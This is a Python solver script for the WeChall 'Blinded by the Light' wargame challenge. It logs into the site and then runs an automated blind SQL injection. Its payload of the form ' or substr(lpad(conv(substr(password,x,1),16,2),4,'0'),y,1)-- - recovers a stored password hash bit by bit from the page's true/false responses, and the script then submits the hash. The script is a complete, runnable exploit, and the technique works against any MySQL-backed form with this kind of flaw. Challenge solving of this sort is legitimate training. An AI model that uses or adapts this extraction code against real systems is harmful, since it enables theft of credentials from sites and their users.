#
# [WeChall.net] Blinded by the Light
# Solution by MakMan
# http://mukarramkhalid.com/solution-blinded-by-the-light/
# Requirements : Python 3.4.x or Higher, Requests Module
#
import re, os, sys, getpass
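# Requests is the only third-party dependency. Catch ImportError specifically:
# a bare ``except`` would also swallow KeyboardInterrupt/SystemExit and hide
# unrelated failures behind the same message.
try:
    import requests
except ImportError:
    # sys.exit is used instead of the site-provided exit(), which is meant for
    # the interactive interpreter and is not guaranteed to exist.
    sys.exit('[-] Importing Requests module failed')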
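class weChall:
    '''Authenticated WeChall session holder (http://www.wechall.net).

    Logs in when constructed and stores the resulting ``Cookie`` request
    header in ``self.Cookie`` so that subclasses can replay it on their own
    requests.
    '''
    # NOTE(review): both endpoints are plain HTTP, so the username, password
    # and session cookie travel unencrypted and can be read or altered by
    # anyone on the network path. Prefer the https:// form of these URLs if
    # the site serves it -- confirm before switching.
    loginUrl = 'http://www.wechall.net/login'
    challUrl = 'http://www.wechall.net/challenge/blind_light/index.php'
    # Seconds to wait for any single HTTP request; matches the value the
    # challenge requests in this file already use.
    _timeout = 30

    def __init__(self, username, password):
        '''Log in immediately with the given credentials.'''
        self.login(username, password)

    def login(self, username, password):
        '''Authenticate, reset the challenge counter and keep the cookie.

        Exits the process with a message when the network request fails,
        when the login is rejected, or when no cookie was sent on the reset
        request (without it the later requests would be unauthenticated).
        '''
        # The context manager closes the session's connection pool even when
        # one of the exits below fires.
        with requests.Session() as s:
            try:
                # First GET lets the server set its initial session cookie.
                s.get(self.loginUrl, timeout=self._timeout)
                r = s.post(
                    self.loginUrl,
                    data={'username': username, 'password': password, 'login': 'Login'},
                    timeout=self._timeout,
                )
            except requests.RequestException:
                sys.exit('[-] Please check your internet connection')

            if 'Welcome back to WeChall' not in r.text:
                sys.exit('[-] Login Failed')

            print('[+] Login Successful')
            print('[+] Resetting attempt counter')
            try:
                r = s.get(self.challUrl + '?reset=me', timeout=self._timeout)
            except requests.RequestException:
                sys.exit('[-] Please check your internet connection')

            # The cookie is read back from the request that was actually sent.
            # .get() avoids a bare KeyError when the session held no cookie.
            cookie = r.request.headers.get('Cookie')
            if not cookie:
                sys.exit('[-] No session cookie available after login')
            self.Cookie = cookie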
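class solveChall(weChall):
    '''Solver for the "Blinded by the Light" challenge, reusing the weChall login.

    The challenge form answers with one of two fixed sentences. Which one
    comes back is the only signal used: each request asks about a single bit
    of the stored value, and 32 hex characters x 4 bits are collected.
    '''
    # Marker sentences that distinguish a true condition from a false one.
    trueStr = 'Welcome back, user.'
    falseStr = 'Your password is wrong, user.'

    @staticmethod
    def _bitsToHex(bits):
        '''Render a bit string as hex while keeping leading zero nibbles.

        ``hex(int(bits, 2))[2:]`` drops leading zeros, which shortens (and so
        corrupts) any value whose first hex character is 0.
        '''
        if not bits:
            return ''
        width = (len(bits) + 3) // 4
        return '{0:0{1}x}'.format(int(bits, 2), width)

    def inject(self):
        '''Recover the 32-character hex value bit by bit and return it.

        Returns:
            The value as a lowercase hex string, zero-padded to one character
            per four collected bits.

        Exits the process when a request fails or when the response contains
        neither marker sentence, since a skipped bit would silently shift
        every later bit.
        '''
        bits = ''
        attempt = '?'
        print('[+] Solving [Wechall.net] Blinded by the Light')
        for x in range(1, 33):          # position of the hex character
            for y in range(1, 5):       # bit within that character, MSB first
                # The form value is presumably concatenated into the SQL
                # statement server-side (not visible here); a parameterized
                # query there would remove this true/false signal.
                payload = "' or substr(lpad(conv(substr(password,{0},1),16,2),4,'0'),{1},1)-- -".format(x, y)
                data = {'injection': payload, 'inject': 'Inject'}
                try:
                    r = requests.post(
                        self.challUrl,
                        data=data,
                        headers={'Cookie': self.Cookie},
                        timeout=30,
                    )
                except requests.RequestException:
                    # Narrow catch: a bare except would also report Ctrl-C as
                    # a connectivity problem.
                    sys.exit('[-] Please check your internet connection')

                if self.trueStr in r.text:
                    found = re.search('You would now be logged in after (.+?) attempts', r.text)
                    bits += '1'
                elif self.falseStr in r.text:
                    # Raw string: '\.' in a normal literal is an invalid escape.
                    found = re.search(r'This was your (.+?)\. attempt', r.text)
                    bits += '0'
                else:
                    sys.exit('[-] Unexpected response from the challenge page')

                # The counter text is informational only; keep the previous
                # value if the page wording does not match.
                if found:
                    attempt = found.group(1)

                os.system('cls' if os.name == 'nt' else 'clear')
                print('[+] Attempts : ' + attempt)
                print('[+] Solution : ' + self._bitsToHex(bits))
                print('\nPlease Wait .. ')
                sys.stdout.flush()
        print('[+] Done')
        return self._bitsToHex(bits)

    def submitSolution(self, myHash):
        '''Post the recovered value to the challenge and report the verdict.'''
        try:
            r = requests.post(
                self.challUrl,
                data={'thehash': myHash, 'mybutton': 'Enter'},
                headers={'Cookie': self.Cookie},
                timeout=30,
            )
        except requests.RequestException:
            sys.exit('[-] Please check your internet connection')
        if 'Your answer is correct' in r.text:
            print('[+] Challenge completed successfully.')
        else:
            print('[-] Something went wrong. Please try again.')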
def main():
    '''Ask for WeChall credentials, recover the value and submit it.'''
    username = input('Enter WeChall Username: ')
    # getpass keeps the password off the terminal while it is typed.
    password = getpass.getpass('Enter WeChall Password: ')
    solver = solveChall(username, password)
    recovered = solver.inject()
    solver.submitSolution(recovered)
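# Run only when executed as a script, and turn Ctrl-C into a short message
# instead of a traceback.
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # sys.exit rather than the site-provided exit(), which is intended
        # for the interactive interpreter.
        sys.exit('[-] CTRL-C detected.')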
# End